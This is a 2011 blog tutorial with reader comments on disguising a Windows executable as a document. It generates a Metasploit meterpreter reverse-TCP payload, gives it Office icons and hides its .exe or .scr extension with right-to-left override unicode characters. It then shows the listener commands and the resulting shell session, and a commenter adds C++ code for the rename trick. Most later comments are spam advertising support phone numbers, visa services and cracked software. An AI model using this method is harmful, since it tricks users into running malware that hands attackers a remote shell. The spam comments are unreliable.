Monday, October 24, 2011

Social engineering with unicode filenames

There have been several reports on special unicode characters being used to hide the real extension of a file - most times to make an execute file look like a document or a picture file, tricking the user into starting the executable.

Although the attack is not new, I could not find much information about good ways to create such files - so here is how I created a meterpreter payload and made it look like a normal file on Windows Vista/7.
During the process, I accessed the files both from Linux (metasploit, ruby) and Windows (Resource Hacker) using a Virtual Box machine with a shared folder. It should be possible to do everything on Windows only, but I did not test it.

[update 2011-11-04]
I just tested the examples with Windows 7 + Ruby 1.9.2. As a reader reported in the comments, the original examples do not work. Ruby 1.9.2 has improved unicode support, so we can use the \uXXXX codes directly - I added an alternative version of the commands.
[/update]

First, create a payload:

./msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -f exe LHOST=192.168.1.1 LPORT=4444 >/tmp/demo.exe


To make the file look like our target format, we need to give the executable file an icon. Copy demo.exe to demo_doc.exe and demo_ppt.exe to create a Word and a Powerpoint template.

Now we need to find the correct icons for these filetypes. Start Resource Hacker (http://www.angusj.com/resourcehacker/) and open the Word executable holding the icons ("c:\program files\microsoft office\office14\wordicon.exe" on my system). Find a suitable icon group and note the corresponding values (resource name = 201 and language = 1033 in my case). Resource Hacker showed some error messages on my system, but it worked nonetheless.



Now open your payload (demo_doc.exe) file in Resource Hacker. Click "Action -> Add a new Resource".  Open the file holding the icon (wordicon.exe in my case), set resource type to "ICON" and enter the collected values.
If you use an executable that already has an icon (e.g. when executing msfvenom with calc.exe as a template), use "Action -> Replace Icon".



Click "Add Resource" and save the file.

Repeat the process for the Powerpoint file. I used the file powerpnt.exe, resource name = 1301, language = 1033.

This is what you should see in Windows Explorer:







Theoretically, you could first rename the files before editing the icon resources. However, in my tests Resource hacker did not work correctly with the unicode filenames, so I recommend doing it in the described order.

The most used character for these tricks is "right-to-left override" (RTLO), in unicode: U+202E.
First, we need to convert this into an UTF-8 representation. You can do this by hand, like described here: http://home.tiscali.nl/t876506/utf8tbl.html, or you can just look it up: http://www.fileformat.info/info/unicode/char/202e/index.htm

So, U+202E converts to 0xE280AE.
With a simple RTLO, we can reverse the right side of the filename, so "cod.exe" looks like "exe.doc". We are quite limited here, as the name of the file needs to end on exe.

One good example I found was a file displayed as "SexyAlexe.ppt". The real name of this file is "SexyAl\xe2\x80\xaetpp.exe".

I used ruby to execute the rename commands, as the special characters sometimes cause problems if you try to execute them in a normal shell.

# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\xe2\x80\xaetpp.exe")'

# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\u202Etpp.exe")'


In Windows Explorer:




For more advanced file names, we need a second unicode character: U+202D = 0xE280AD, this one is called left-to-right override (LTRO).

Using this, the real file extension of the file can be placed anywhere in the displayed filename. We now also use .scr as extension to have more options.

# [RTLO]cod.yrammus_evituc[LTRO]2011.exe

# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_doc.exe", "\xe2\x80\xaecod.yrammus_evituc\xe2\x80\xad2011.exe")'

# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_doc.exe", "\u202Ecod.yrammus_evituc\u202D2011.exe")'


# [RTLO]tpp.stohsnee[LTRO]funny.scr

# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_ppt.exe", "\xe2\x80\xaetpp.stohsnee\xe2\x80\xadfunny.scr")'

# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_ppt.exe", "\u202Etpp.stohsnee\u202Dfunny.scr")'

The filename is created in two parts, first writing from right to left and then from left to right, prepending the characters left of all those already written.

Result:






Open a metasploit console on the attacking machine:

./msfconsole
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.1
msf  exploit(handler) > exploit
Now, open one of the created files on the target machine and you should get a meterpreter shell:
[*] Started reverse handler on 192.168.1.1:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.100:54354) at Sun Oct 23 19:42:30 +0200 2011
Of course, no document will be opened and some users might get suspicious. An advanced version of this attack would use an executable file that extracts an embedded document, opens it and then executes the reverse shell.

33 comments:

  1. At first I thought this is going to be easy in VC++ 2010 "rename() or CopyFile()".

    but...It isn't, dealing with UNICODE filenames in C turned out to be not straight forward.

    Will really appreciate some help if someone managed to do this in C(++).

    ReplyDelete
  2. Great job.

    But sending "funny.screenshot.doc" with a Powerpoint icon is not that discrete :)

    Anyways we both know that´s just a detail, great post, man.

    ReplyDelete
  3. I figured out how to do it in C++, using _wrename() instead of rename()

    compile the following code and place test.exe in the same directory, then execute

    //CODE
    #include
    int main(int argc, char* argv[])
    {
    int result;
    const wchar_t* wide_oldname = L"test.exe";

    wchar_t newname[] = L"Presentation_Al"
    L"\u202E"
    L"tpp.exe"; //RTOL Unicode, keep as is

    result = _wrename( wide_oldname , newname );
    if ( result == 0 )
    puts ( "File successfully renamed" );
    else
    perror( "Error renaming file" );
    return 0;
    }

    ReplyDelete
    Replies
    1. Total Commander shows the file name properly - as EXE file

      Delete
  4. [RLO] Unicode character REALLY confuses windows :) "Try to read the error message"

    http://img560.imageshack.us/img560/5337/capture0022710201109555.jpg

    ReplyDelete
  5. @Julio:
    thanks for the hint - I just corrected that.

    @Sherif:
    This might be useful to create a loader program that extracts & opens a real office file and then executes a payload, thanks for sharing your code and the nice error message :)

    ReplyDelete
  6. I tried this on Windows 7 Professional x64 with Ruby ver 1.9.2. I tried to reproduce the example i.e. tried renaming a file from "demo_ppt.exe" to "SexyAlexe.ppt". But unexpectedly I get:

    "SexyAlΓÇxaeppt.exe"

    when I execute:

    ruby -e 'File.rename("demo_ppt.exe", "SexyAl\xe2\x80\xaetpp.exe")'

    Why doesn't it work? Am I missing something?

    ReplyDelete
  7. The ruby being used in the blog post is under linux.

    the windows version of ruby will output "THREE" charachters xe2 & x80 & xae, not the "xe280ae" single charachter.

    this is maybe because of the cmd.exe?
    under windows, just use the charmap.exe!!

    ReplyDelete
  8. Thanks. It seems to be fine now. :)

    ReplyDelete
  9. Strangely,

    "SexyAl\xe2\x80\xaetpp.exe"

    produces "SexyAlexe.ppt" where as

    "\xe2\x80\xaecod.yrammus_evituc\xe2\x80\xad2011.exe"

    produces

    _summary.doc2011executive

    on Backtrack 5 R1 (1.9.2). Same filename on Windows 7 x64.

    Thoughts?

    ReplyDelete
  10. I also had the described problem when trying this on Windows 7 + Ruby 1.9.2.
    Ruby 1.9.2 has improved unicode support and uses different libraries on Windows than version 1.8.x.

    It is possible to use the \uXXXX codes directly without converting them UTF-8 - I updated the examples in the post accordingly.

    ReplyDelete
  11. Software engineering can be defined as, "the application of a systematic, disciplined, quantifiable approach to the development, operation, and maintenance of software." Another definition states, "an engineering discipline that is concerned with all aspects of software production."cheap Revit Architecture 2015

    ReplyDelete
  12. Do you have difficulty in writing an finance assignment? Here is the solution! Opt for our finance assignment help and get a high-quality academic assignment written within the set deadline. As an assignment help provider, we know the importance of finance assignment in students' life. fullassignment has a team with expertise and experience in finance assignment help. We provide the best online assignment help to students. For more info please visit our website: https://fullassignment.com/
    https://fullassignment.com/services/finance-accounting-assignment-help
    or reach out us on whatsapp - (+1) 669-271-4848

    ReplyDelete
  13. Do you have difficulty in writing an database assignment? Here is the solution! Opt for our database assignment help and get a high-quality academic assignment written within the set deadline. As an assignment help provider, we know the importance of database assignment in students' life. fullassignment has a team with expertise and experience in database assignment help. We provide the best online assignment help to students. For more info please visit our website: https://fullassignment.com/
    https://fullassignment.com/services/finance-accounting-assignment-help
    or reach out us on whatsapp - (+1) 669-271-4848

    ReplyDelete
  14. Nice & Informative Blog !
    Finding adequate technical services for QuickBooks in this competitive world is quite challenging. Our team at QuickBooks Customer Support Number 1-877-948-5867 is always available to offer you the best technical help for QuickBooks.

    ReplyDelete
  15. I am reading a blog on this website for the first time and I would like to tell you that the quality of the content is up to the mark. It is very well written. Thank you so much for writing this blog and I will surely read all the blogs from now on. I also write blog and my latest blog is QuickBooks Error 6069

    ReplyDelete
  16. This field is very much profitable and many professionals join it because they want to secure their future. If you are jobless, you should join this field and enjoy earning money. Dissertation writing services.

    ReplyDelete
  17. Hey! What a wonderful blog. I loved your blog. QuickBooks is the best accounting software, however, it has lots of bugs like QuickBooks Error. To fix such issues, you can contact experts via QuickBooks Customer Service Phone Number

    ReplyDelete
  18. Hey! Well-written blog. It is the best thing that I have read on the internet today. Moreover, if you are looking for the solution of QuickBooks Software, visit at QuickBooks Customer Service Number to get your issues resolved quickly.

    ReplyDelete
  19. Wow, this is delightful reading.I'm glad I found it and got to read it. Great job on this content. I felt very good. Thanks for the great and unique info.Turkish Visit Visa, All citizens have to complete visa transit Turkey, go through the application process and pay the fee.

    ReplyDelete
  20. Great work! It is the best thing that I have read on the internet today. Moreover, If you encounter any error while working on QuickBooks software , do contact this QuickBooks Customer Support (855)552-2543 number for quick assistance.

    ReplyDelete
  21. Nice Blog, I have get enough information from your blog and I appreciate your way of writing.
    Thanks for everything Passfab iPhone unlocked registration code

    ReplyDelete
  22. Thanks for your efforts. This is really an inspiring and helpful article. There is no need to meet the Ukraine embassy specially to get a valid Ukraine visa. You can get a Ukraine-visa in 4 working days.

    ReplyDelete
  23. Thanks for sharing good blog. Yoga have the power to change your mentality that how to think ,how to control your mind and how to use it. Yoga, yogainfo , yoga history, you reach us at

    ReplyDelete
  24. Good afternoon sir, Many people ask, How to apply Indian e visa? You can read about applying for an Indian e visa eta through our website.

    ReplyDelete
  25. Nice article I was really impressed seeing this article, it was very interesting and it is very useful for me we provide best internship training in chennai

    ReplyDelete
  26. Well-written information. Very impressive and to the point
    Have a look at my new blog Apeaksoft PDF Converter Crack 2023

    ReplyDelete
  27. Setting sail into this blog is akin to embarking on a journey across the vast sea of intellect. The author's prose becomes a guiding chart, navigating through uncharted waves of thought. Each paragraph unfurls like a sail, contributing to a harmonious symphony of enlightenment. i am eager to share some information with you Applying for a Turkish visa online is a convenient and efficient process. The Turkish visa online platform streamlines the application, offering a user-friendly experience. Navigating through the Turkish visa online system ensures a hassle-free and prompt approval, facilitating seamless travel arrangements.

    ReplyDelete
  28. This comment has been removed by the author.

    ReplyDelete

  29. Dental Card Processing streamlines the payment process by offering a range of features tailored to the unique needs of dental practices. This includes the ability to securely store patient card information for future payments, allowing for quick and easy transactions during subsequent visits. Additionally, Dental Card Processing ensures the highest level of security by complying with industry standards and utilizing encryption technology to protect sensitive cardholder data.

    By utilizing Dental card processing, dental practices can enhance their overall patient experience by offering a convenient and modern payment option. Patients no longer need to worry about carrying cash or writing checks, as they can simply use their credit or debit cards to settle their dental bills.

    ReplyDelete
  30. You have given great content here.iphone 7 unlocked price I am glad to discover this post as I found lots of valuable data in your article. Thanks for sharing an article like this.

    ReplyDelete